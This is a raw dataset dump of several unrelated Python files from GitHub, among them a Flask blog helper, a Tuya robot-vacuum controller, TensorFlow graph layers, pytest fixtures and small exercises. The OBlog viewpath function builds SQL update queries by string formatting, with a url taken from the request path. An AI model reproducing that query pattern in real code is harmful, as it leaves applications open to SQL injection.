phone)\n","repo_name":"santosgonz/biogly","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19497169739","text":"import sys\r\nn = int(input())\r\nstack = []\r\nstack_reverse = []\r\nwhile n > 0:\r\n comand = input().split()\r\n n -= 1
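\r\n # Added note (not in the original): each query is one of \"1 x\" (push x),\r\n # \"2\" (pop), \"3\" (print the max), \"4\" (print the min).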
\r\n\r\n if comand[0] == \"1\":\r\n if int(comand[1]) <= 10**9:\r\n stack.append(int(comand[1]))\r\n\r\n elif comand[0] == \"2\":\r\n if len(stack) > 0:\r\n stack.pop()\r\n else:\r\n continue\r\n\r\n elif comand[0] == \"3\":\r\n if len(stack) > 0:\r\n print(max(stack))\r\n\r\n elif comand[0] == \"4\":\r\n if len(stack):\r\n print(min(stack))\r\n\r\nif n == 0:\r\n while len(stack):\r\n stack_reverse.append(stack.pop())\r\nprint(\", \".join(map(str, stack_reverse)))","repo_name":"Georgi552/Pyton_Advanced_Softuni","sub_path":"2. Maximum and Minimum Element Exersise 50%.py","file_name":"2. Maximum and Minimum Element Exersise 50%.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24660971816","text":"from flask import g\r\nfrom . import database as db\r\nfrom OBlog import app\r\nfrom .blueprint.posts.main import getPostForShow\r\nfrom .blueprint.admin.main import getSiteConfigDict\r\nimport re\r\n\r\ndef getSite():\r\n if not hasattr(g, 'getSite'):\r\n res = getSiteConfigDict()\r\n from .blueprint.pages.main import getPagesDict\r\n res['pages'] = getPagesDict()\r\n from .blueprint.friends.main import getFriends\r\n res['friends'] = getFriends()\r\n g.getSite = res\r\n \r\n rooturl = res['rooturl']['value']\r\n if not rooturl: # field was left empty\r\n rooturl = \"/\"\r\n res[\"rooturl\"][\"value\"] = rooturl + '/' if rooturl[-1] != '/' else rooturl\r\n return g.getSite\r\n\r\ndef getRoot():\r\n return getSite()['rooturl']['value']\r\n\r\n\r\ndef viewpath(ip, addr):\r\n if not addr.startswith((\"/stati\", \"/api/\", \"/admi\")):\r\n #if addr not in session:\r\n #session[addr] = True\r\n view = getSiteConfigDict()\r\n view = str(int(view['view']['value']) + 1)\r\n db.commit_db(r\"update siteConfig set value='%s' where sid='view'\" % view)\r\n\r\n match = re.match(r'^/post/(.*?)/$', addr)\r\n if match is not None:\r\n url = match.group(1)\r\n post = getPostForShow(url)\r\n if post is not None:\r\n view = str(int(post['view']) + 1)\r\n db.commit_db(\"update posts set view='%s' where url='%s'\" % (view, url))\r\n","repo_name":"OhYee/OBlog","sub_path":"OBlog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"23084876606","text":"from selenium import webdriver\nfrom .yadi_disk_api import API\nfrom .pages.login_page import LoginPage\nimport urllib.parse\nimport pytest\nimport time\n\n\ndef pytest_addoption(parser):\n parser.addoption('--browser_name', action='store', default=\"chrome\",\n help=\"Choose browser: chrome or firefox\")\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n browser_name = request.config.getoption(\"browser_name\")\n browser = None\n if browser_name == \"chrome\":\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome()\n elif browser_name == \"firefox\":\n print(\"\\nstart firefox browser for test..\")\n browser = webdriver.Firefox()\n else:\n raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef setup(browser):\n link = \"https://disk.yandex.ru/client\"\n login_page = LoginPage(browser, link)\n login_page.open()\n login = \"your login\"\n password = \"your password\"\n login_page.login_user(login, password)\n time.sleep(1)\n # Had to add this wait so that another page can be opened;\n # without it, the login page does not finish loading.\n\n\n
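# Added note (not in the original): the params value \"QA%2FQA2\" is URL-encoded\n# (\"%2F\" decodes to \"/\"); urllib.parse.unquote in the fixture below yields\n# \"QA/QA2\", so each parent folder is created before the nested one.\n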
@pytest.fixture(scope=\"function\", params=[\"QA%2FQA2\"])\ndef new_folder(request):\n disk = API()\n end_name = 0\n beginning_name = 0\n path_to_folder = request.param\n true_path = urllib.parse.unquote(path_to_folder)\n\n for i in true_path:\n end_name += 1\n if i == \"/\":\n disk.create_folder(path_to_folder[0:end_name-1])\n end_name += 2\n beginning_name = end_name\n\n if beginning_name == 0 and end_name != 0:\n disk.create_folder(path_to_folder)\n else:\n if beginning_name != 0:\n disk.create_folder(path_to_folder[0:end_name])\n\n yield path_to_folder\n end_name = 0\n beginning_name = 0\n\n for i in true_path:\n end_name += 1\n if i == \"/\":\n disk.delete_file_or_folder(path_to_folder[0:end_name-1])\n beginning_name = end_name\n break\n\n if beginning_name == 0 and end_name != 0:\n disk.delete_file_or_folder(path_to_folder)\n\n disk.empty_trash()\n\n\n@pytest.fixture(scope=\"function\", params=[\"catcat\"])\ndef new_file(request):\n disk = API()\n url = \"https://i.imgur.com/Ve9zZPX.jpg\"\n path_created_resource = request.param\n disk.upload_url(path_created_resource, url)\n\n yield path_created_resource\n disk.delete_file_or_folder(path_created_resource)\n disk.empty_trash()\n","repo_name":"17cyber17/yadi_disk_api_test","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23522921584","text":"from ellipticcurve import PrivateKey\nfrom datetime import datetime, date, timedelta\n\n\ndef check_environment(environment):\n from ..environment import Environment\n environments = Environment.values()\n assert environment in environments, \"Select a valid environment: {}\".format(\", \".join(environments))\n return environment\n\n\ndef check_private_key(pem):\n try:\n assert PrivateKey.fromPem(pem).curve.name == \"secp256k1\"\n except:\n raise Exception(\"Private-key must be valid secp256k1 ECDSA string in pem format\")\n return pem\n\n\ndef check_user(user):\n from ..user.__user import User\n assert isinstance(user, User), \"A user is required to access our API. Check our README: https://github.com/starkbank/sdk-python/\"\n return user
\n\n\ndef check_language(language):\n accepted_languages = [\"en-US\", \"pt-BR\"]\n assert language in accepted_languages, \"Language must be one from {}\".format(accepted_languages)\n return language\n\n\ndef check_datetime_or_date(data):\n if data is None:\n return None\n\n if type(data) == datetime:\n return data\n\n if isinstance(data, date):\n return data\n\n data, dt_type = check_datetime_string(data)\n\n return data.date() if dt_type == date else data\n\n\ndef check_datetime(data):\n if data is None:\n return None\n\n if type(data) == datetime:\n return data\n\n if isinstance(data, date):\n return datetime(data.year, data.month, data.day)\n\n return check_datetime_string(data)[0]\n\n\ndef check_date(data):\n if data is None:\n return None\n\n if isinstance(data, datetime):\n return data.date()\n\n if isinstance(data, date):\n return data\n\n data, dt_type = check_datetime_string(data)\n\n return data.date() if dt_type == date else data\n\n\ndef check_timedelta(data):\n if data is None:\n return None\n\n if isinstance(data, timedelta):\n return data\n\n try:\n return timedelta(seconds=data)\n except:\n raise TypeError(\n \"invalid timedelta {data}, please use an integer in seconds or a datetime.timedelta object\".format(data=data)\n )\n\n\ndef check_datetime_string(data):\n data = str(data)\n\n try:\n return datetime.strptime(data, \"%Y-%m-%d\"), date\n except:\n pass\n\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%S.%f+00:00\"), datetime\n except:\n pass\n\n try:\n return datetime.strptime(data, \"%Y-%m-%dT%H:%M:%S+00:00\"), datetime\n except:\n pass\n\n raise RuntimeError(\"invalid datetime string \" + data)\n","repo_name":"isaccanedo/sdk-python","sub_path":"starkbank/utils/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39307935735","text":"import whisper\nimport argparse\n\ndef getArgs(): \n\n parser = argparse.ArgumentParser(description='Transcribe an audio file with Whisper.')\n parser.add_argument('--model', '-m', type=str, required=True)\n parser.add_argument('--audio', '-a', type=str, required=True)\n parser.add_argument(\"--filewrite\", '-f', action=\"store_true\")\n parser.add_argument('--filename', '-fn', type=str)\n return parser.parse_args()\n\n\ndef main(): \n args = getArgs()\n model = whisper.load_model(args.model)\n result = model.transcribe(args.audio)\n\n\n if args.filewrite:\n with open(args.filename, \"w\") as file:\n file.write(result[\"text\"])\n\n else: \n print(result[\"text\"])\n\n\nif __name__ == '__main__':\n main()","repo_name":"Yalton/OpenAI_Whisper_Playground","sub_path":"whisper_transcribe.py","file_name":"whisper_transcribe.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32387130575","text":"import asyncio\nimport colorsys\nimport udi_interface\nimport time\nimport json\nfrom tuya_connector import (\n TuyaOpenAPI,)\n\n\nLOGGER = udi_interface.LOGGER\n\nclass RobvacNode(udi_interface.Node):\n def __init__(self, polyglot, primary, address, name, new_id, deviceid, apiAccessId, apiSecret, apiEndpoint, apiRegion):\n super(RobvacNode, self).__init__(polyglot, primary, address, name)\n self.poly = polyglot\n self.lpfx = '%s:%s' % (address, name)\n self.poly.subscribe(self.poly.START, self.start, address)\n self.poly.subscribe(self.poly.POLL, self.poll)
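\n # Added note (not in the original): driver mapping used by this node --\n # GV2 power on/off, GV3 requested clean mode, GV4 reported status, GV5\n # battery %, TIME accumulated clean time, GV7 manual direction, GV8 suction.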
\n self.new_id = new_id\n self.deviceid = deviceid\n self.DEVICEBOT_ID = deviceid\n self.apiAccessId = apiAccessId\n self.ACCESS_ID = apiAccessId\n self.apiSecret = apiSecret\n self.ACCESS_KEY = apiSecret\n self.apiEndpoint = apiEndpoint\n self.API_ENDPOINT = apiEndpoint\n self.apiRegion = apiRegion\n self.API_REGION = apiRegion\n self.SwStat(self)\n self.setDriver('ST', 1)\n \n # Robot On\n def setSwOn(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n\n commands = {'commands': [{'code': 'power_go', 'value': True}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n time.sleep(.5)\n self.setDriver('GV2', 1)\n #self.SwStat(self)\n\n # Robot Off\n def setSwOff(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n \n commands = {'commands': [{'code': 'mode', 'value': 'chargego'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n time.sleep(.5)\n self.setDriver('GV2', 0)\n #self.SwStat(self)\n\n # Set Modes\n def modeOn(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n # local variable so the method is not shadowed by an int attribute\n mode = int(command.get('value'))\n self.setDriver('GV3', mode)\n # Charge\n if mode == 0:\n commands = {'commands': [{'code': 'mode', 'value': 'chargego'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Charge')\n time.sleep(.5)\n self.SwStat(self)\n # Standby\n elif mode == 1:\n commands = {'commands': [{'code': 'mode', 'value': 'standby'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Standby')\n time.sleep(.5)\n self.SwStat(self)\n # Spiral\n elif mode == 2:\n commands = {'commands': [{'code': 'mode', 'value': 'spiral'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Spiral')\n time.sleep(.5)\n self.SwStat(self)\n # Wall Follow\n elif mode == 3:\n commands = {'commands': [{'code': 'mode', 'value': 'wall_follow'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Wall Follow')\n time.sleep(.5)\n self.SwStat(self)\n # Random\n elif mode == 4:\n commands = {'commands': [{'code': 'mode', 'value': 'random'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Random')\n time.sleep(.5)\n self.SwStat(self)\n # Partial Bow\n elif mode == 5:\n commands = {'commands': [{'code': 'mode', 'value': 'partial_bow'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Partial Bow')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass
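\n\n # Added sketch (not in the original): every branch above posts the same\n # Tuya payload shape; a table-driven helper like this one could replace\n # the repetition. It is illustrative only and not wired into the command map.\n def _post_command(self, code, value):\n openapi = TuyaOpenAPI(self.API_ENDPOINT, self.ACCESS_ID, self.ACCESS_KEY)\n openapi.connect()\n commands = {'commands': [{'code': code, 'value': value}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(self.DEVICEBOT_ID), commands)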
\n\n # Manual Control\n def modeMan(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n # local variable so the method is not shadowed by an int attribute\n mode = int(command.get('value'))\n self.setDriver('GV7', mode)\n \n # Forward\n if mode == 0:\n commands = {'commands': [{'code': 'direction_control', 'value': 'forward'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Forward')\n time.sleep(.5)\n self.SwStat(self)\n # Backward\n elif mode == 1:\n commands = {'commands': [{'code': 'direction_control', 'value': 'backward'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Backwards')\n time.sleep(.5)\n self.SwStat(self)\n # Turn Left\n elif mode == 2:\n commands = {'commands': [{'code': 'direction_control', 'value': 'turn_left'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Turn Left')\n time.sleep(.5)\n self.SwStat(self)\n # Turn Right\n elif mode == 3:\n commands = {'commands': [{'code': 'direction_control', 'value': 'turn_right'}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Turn Right')\n time.sleep(.5)\n self.SwStat(self)\n # Stop\n elif mode == 4:\n commands = {'commands': [{'code': 'power_go', 'value': False}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Stop')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass\n\n # Suction\n def modeSuc(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n # local variable so the method is not shadowed by an int attribute\n mode = int(command.get('value'))\n self.setDriver('GV8', mode)\n \n # Suction Gentle\n if mode == 0:\n commands = {'commands': [{'code': 'suction', 'value': \"gentle\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction Gentle')\n time.sleep(.5)\n self.SwStat(self)\n # Suction Normal\n elif mode == 1:\n commands = {'commands': [{'code': 'suction', 'value': \"normal\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction Normal')\n time.sleep(.5)\n self.SwStat(self)\n # Suction High\n elif mode == 2:\n commands = {'commands': [{'code': 'suction', 'value': \"strong\"}]}\n openapi.post(\n '/v1.0/iot-03/devices/{}/commands'.format(DEVICEBOT_ID), commands)\n LOGGER.info('Suction High')\n time.sleep(.5)\n self.SwStat(self)\n else:\n pass
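\n\n # Added note (not in the original): SwStat below reads fixed positions of\n # the Tuya status array -- [0] power flag -> GV2, [4] battery % -> GV5,\n # [6] clean time -> TIME, [3] mode string -> GV4.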
\n\n def SwStat(self, command):\n API_ENDPOINT = self.API_ENDPOINT\n ACCESS_ID = self.ACCESS_ID\n ACCESS_KEY = self.ACCESS_KEY\n DEVICEBOT_ID = self.DEVICEBOT_ID\n openapi = TuyaOpenAPI(API_ENDPOINT, ACCESS_ID, ACCESS_KEY)\n openapi.connect()\n\n response1 = openapi.get(\n \"/v1.0/iot-03/devices/{}\".format(DEVICEBOT_ID) + \"/status/\")\n LOGGER.info(response1)\n for i in response1['result'][0:1]:\n # LOGGER.info(i['value'])\n if i['value'] == True:\n self.setDriver('GV2', 1)\n elif i['value'] == False:\n self.setDriver('GV2', 0)\n for i in response1['result'][4:5]:\n self.setDriver('GV5', i['value'])\n LOGGER.info('Battery %')\n for i in response1['result'][6:7]:\n self.setDriver('TIME', i['value'])\n LOGGER.info('Clean time')\n for i in response1['result'][3:4]:\n LOGGER.info(i['code'])\n LOGGER.info(i['value'])\n if i['value'] == 'standby':\n self.setDriver('GV4',0)\n elif i['value'] == 'smart_clean':\n self.setDriver('GV4',1)\n elif i['value'] == 'wall_clean':\n self.setDriver('GV4',2)\n elif i['value'] == 'spot_clean':\n self.setDriver('GV4',3)\n elif i['value'] == 'goto_charge':\n self.setDriver('GV4',4)\n elif i['value'] == 'charging':\n self.setDriver('GV4',5)\n elif i['value'] == 'charge_done':\n self.setDriver('GV4',6)\n elif i['value'] == 'cleaning':\n self.setDriver('GV4',7)\n elif i['value'] == 'sleep':\n self.setDriver('GV4',8)\n else:\n pass\n \n def poll(self, polltype):\n if 'longPoll' in polltype:\n LOGGER.debug('longPoll (node)')\n else:\n self.SwStat(self)\n self.query(self)\n LOGGER.debug('shortPoll (node)')\n\n def query(self, command=None):\n self.SwStat(self)\n self.reportDrivers()\n\n drivers = [\n {'driver': 'GV2', 'value': 0, 'uom': 25},\n {'driver': 'GV3', 'value': 0, 'uom': 25},\n {'driver': 'GV4', 'value': 0, 'uom': 25},\n {'driver': 'GV5', 'value': 0, 'uom': 51},\n {'driver': 'TIME', 'value': 0, 'uom': 56},\n {'driver': 'GV7', 'value': 0, 'uom': 25},\n {'driver': 'GV8', 'value': 0, 'uom': 25},\n {'driver': 'ST', 'value': 1, 'uom': 2},\n\n ]\n\n id = 'robvac'\n\n commands = {\n 'BOTON': setSwOn,\n 'BOTOF': setSwOff,\n 'MODE1': modeOn,\n 'MODEM': modeMan,\n 'MODES': modeSuc, \n 'QUERY': query,\n }\n","repo_name":"sjpbailey/udi-tuya-poly-robotvacuum-api-v3","sub_path":"nodes/tuya_robotvac_node.py","file_name":"tuya_robotvac_node.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36527662028","text":"import sys\ninput = sys.stdin.readline\n\ntestCase = int(input())\n\ncandi=[[] for _ in range(testCase)]\n# print(candi)\nfor i in range(testCase):\n N = int(input())\n \n for j in range(N):\n candi[i].append(list(map(int, input().split())))\n # print(candi[i])\n ans = []\n candi[i].sort(key = lambda x: x[0])\n ans.append(candi[i][0])\n print('ans init =', ans)\n for k in range(1, len(candi[i])): # passes if the interview rank beats everyone with a better document rank\n target = candi[i][k][1]\n print('target===========', candi[i][k]) \n for l in range(0, k):\n betterPaper = candi[i][l][1] # interview ranks of applicants with a better document rank, to compare against\n print('betterPaper', candi[i][l])\n if target < betterPaper: # if the interview rank is better (smaller) than that of someone with a better document rank\n ans.append(candi[i][k])\n print('ans = ', ans)\n break\n print(len(ans))\n\n # print(candi[i])\n\n## I misunderstood the problem: you must beat the interview ranks of all applicants with a better document rank ##\n# Also, rather than storing the test cases in two separate passes, a single loop per test case is enough.\n\nimport sys\n\nt = int(sys.stdin.readline().strip())\nfor _ in range(t):\n n = int(sys.stdin.readline().strip())\n applied = [[int(x) for x in sys.stdin.readline().split()] for _ in range(n)]\n applied.sort()\n min_rank = applied[0][1]\n cnt = 1\n for i in range(n):\n rank = applied[i][1]\n if rank < min_rank:\n min_rank = rank\n cnt += 1\n print(cnt)","repo_name":"dearmysolitude/KJ01","sub_path":"04_DP_greedy/1946_신입사원.py","file_name":"1946_신입사원.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9243244775","text":"from deeprig.inits import *\nimport tensorflow.compat.v1 as tf\nimport numpy as np\nflags = tf.compat.v1.flags\nFLAGS = flags.FLAGS\n\n# global unique layer ID dictionary for layer name assignment\n_LAYER_UIDS = {}\n\n\ndef get_layer_uid(layer_name=''):\n \"\"\"Helper function, assigns unique layer IDs.\"\"\"\n if layer_name not in _LAYER_UIDS:\n _LAYER_UIDS[layer_name] = 1\n return 1\n else:\n _LAYER_UIDS[layer_name] += 1\n return _LAYER_UIDS[layer_name]\n\n\ndef dot(x, y, sparse=False):\n x = tf.cast(x, dtype=tf.float32)\n y = tf.cast(y, 
dtype=tf.float32)\n \"\"\"Wrapper for tf.matmul (sparse vs dense).\"\"\"\n if sparse:\n res = tf.sparse_tensor_dense_matmul(x, y)\n else:\n\n res = tf.matmul(x, y)\n return res\n\n\nclass Layer(object):\n \"\"\"Base layer class. Defines basic API for all layer objects.\n Implementation inspired by keras (http://keras.io).\n\n # Properties\n name: String, defines the variable scope of the layer.\n logging: Boolean, switches Tensorflow histogram logging on/off\n\n # Methods\n _call(inputs): Defines computation graph of layer\n (i.e. takes input, returns output)\n __call__(inputs): Wrapper for _call()\n _log_vars(): Log all variables\n \"\"\"\n\n def __init__(self, **kwargs):\n allowed_kwargs = {'name', 'logging'}\n for kwarg in kwargs.keys():\n assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg\n name = kwargs.get('name')\n if not name:\n layer = self.__class__.__name__.lower()\n name = layer + '_' + str(get_layer_uid(layer))\n self.name = name\n self.vars = {}\n logging = kwargs.get('logging', False)\n self.logging = logging\n self.sparse_inputs = False\n\n def _normalize(self, inputs, eps):\n raise NotImplementedError\n\n def _call(self, inputs):\n return inputs\n\n def __call__(self, inputs):\n with tf.name_scope(self.name):\n if self.logging and not self.sparse_inputs:\n tf.summary.histogram(self.name + '/inputs', inputs)\n outputs = self._call(inputs)\n if self.logging:\n tf.summary.histogram(self.name + '/outputs', outputs)\n return outputs\n\n def _log_vars(self):\n for var in self.vars:\n tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])\n\n\nclass Encoder(Layer):\n \"\"\"Encoder layer.\"\"\"\n\n def __init__(self, input_dim, output_dim, gene_size, placeholders, dropout, act=tf.nn.relu, featureless=False, **kwargs):\n super(Encoder, self).__init__(**kwargs)\n\n self.act = act\n self.adj = placeholders['adjacency_matrix']\n self.featureless = featureless\n self.dropout = dropout\n\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weight1'] = glorot([input_dim, output_dim])\n self.vars['weight2'] = glorot([gene_size, output_dim])\n\n if self.logging:\n self._log_vars()\n\n def _normalize(self, A, eps = 1e-6):\n n = tf.shape(A)[-1]\n A -= tf.linalg.diag(tf.linalg.diag_part(A))\n A_hat = A + tf.cast(tf.eye(n), dtype=A.dtype)[tf.newaxis, :, :]\n A_hat = tf.cast(A_hat, tf.float64)\n print(\"Data type of A:\", A.dtype)\n deg = tf.reduce_sum(A_hat, axis=2)\n deg = tf.cast(deg, tf.float64)\n\n D_symm = tf.linalg.diag(1./(eps + tf.math.sqrt(deg)))\n D_asymm = tf.linalg.diag(1./(eps + deg))\n print(D_symm.shape)\n print(A_hat.shape)\n\n normalize_adj = tf.matmul(tf.matmul(D_symm, A_hat), D_symm)\n normalize_adj = tf.squeeze(normalize_adj)\n print(normalize_adj.shape)\n return normalize_adj\n\n def _call(self, inputs):\n # convolution\n if not self.featureless:\n x = inputs\n x = tf.nn.dropout(x, 1- self.dropout)\n pre_sup = dot(x, self.vars['weight1'])\n else:\n pre_sup = self.vars['weight1']\n\n # transform \n T = dot(self.adj, pre_sup)\n hidden = tf.add(T, self.vars['weight2'])\n return self.act(hidden)\n\n\nclass Decoder(Layer):\n \"\"\"Decoder layer.\"\"\"\n\n def __init__(self, size1, latent_factor_num, placeholders, act = tf.nn.sigmoid, **kwargs):\n super(Decoder, self).__init__(**kwargs)\n self.size1 = size1\n self.act = act\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weight3'] = glorot([latent_factor_num, latent_factor_num])\n\n def _call(self, hidden):\n M1 = dot(dot(hidden, self.vars['weight3']), tf.transpose(hidden))\n M1 = tf.reshape(M1, [-1, 1])\n return 
self.act(M1)\n","repo_name":"JChander/DeepRIG","sub_path":"deeprig/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5838692007","text":"import FWCore.ParameterSet.Config as cms\n\n#process = cms.Process(\"RPCPathChambFilter\")\n\nprocess = cms.Process(\"RPCSelectEventsForIlumination\")\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\n\nprocess.selRPC = cms.EDFilter(\"RPCSelectEventsForIlumination\", \n rpcDTPoints = cms.InputTag(\"rpcPointProducer\",\"RPCDTExtrapolatedPoints\"),\n rpcCSCPoints = cms.InputTag(\"rpcPointProducer\",\"RPCCSCExtrapolatedPoints\"),\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n# fileNames = cms.untracked.vstring('rfio:/castor/cern.ch/user/c/carrillo/PointProducer/119090/119090.B294A2F1-72C7-DE11-9B7F-000423D991D4.root')\n fileNames = cms.untracked.vstring('file:/tmp/carrillo/point119090.root')\n)\n\nprocess.FEVT = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = cms.untracked.vstring('keep *'),\n SelectEvents = cms.untracked.PSet(\n SelectEvents = cms.vstring(\"selrpc\")\n ),\n fileName = cms.untracked.string('/tmp/carrillo/RE12.root')\n)\n\nprocess.selrpc = cms.Path(process.selRPC)\nprocess.outpath = cms.EndPath(process.FEVT)\n\n","repo_name":"camilocarrillo/UserCode","sub_path":"RPCSelectEventsForIlumination/rpcselecteventsforilumination.py","file_name":"rpcselecteventsforilumination.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27029215426","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Driving license\")\nroot.geometry(\"500x400\")\n\nroot.configure(bg=\"white\")\ncanvas = Canvas(root, width=500, height=400)\ncanvas.create_rectangle(0, 0, 500, 80, fill=\"#bf2626\")\n\n\nlabel_heading = canvas.create_text(250, 50, font=(\"Times\", \"24\", \"bold italic\"), fill=\"white\", text=\"Driving license\")\nlabel_id_tag = canvas.create_text(40, 100, font=(\"Times\", \"18\", \"bold\"), text=\"ID: \")\nlabel_name_tag = canvas.create_text(40, 165, font=(\"Times\", \"16\", \"bold\"), text=\"Name: \")\nlabel_dob_tag = canvas.create_text(40, 205, font=(\"Times\", \"16\", \"bold\"), text=\"DOB: \")\nlabel_pin_tag = canvas.create_text(40, 250, font=(\"Times\", \"16\", \"bold\"), text=\"Pin: \")\n\nlabel_id = Label(root)\nlabel_name = Label(root)\nlabel_dob = Label(root)\nlabel_pin = Label(root)\n\ndef myCardDetails():\n id = 1113331\n print(type(id))\n name = \"Mrityunjay\"\n print(type(name))\n dob = \"5th August\"\n print(type(dob))\n pin = \"300110\"\n print(type(pin))\n\n label_id['text'] = id\n label_name['text'] = name\n label_dob['text'] = dob\n label_pin['text'] = pin\n\n\nbutton_1 = Button(root, command=myCardDetails, bg=\"yellow\", text=\"Show license details\")\nbutton_1.configure(width=20, activebackground=\"#bf2626\", relief=FLAT)\n\nbutton_1_window = canvas.create_window(150, 330, anchor=CENTER, window=button_1)\nlabel_id_window = canvas.create_window(100, 100, anchor=CENTER, window=label_id)\nlabel_name_window = canvas.create_window(120, 165, anchor=CENTER, window=label_name)\nlabel_dob_window = canvas.create_window(120, 205, anchor=CENTER, window=label_dob)\nlabel_pin_window = canvas.create_window(110, 255, anchor=CENTER, 
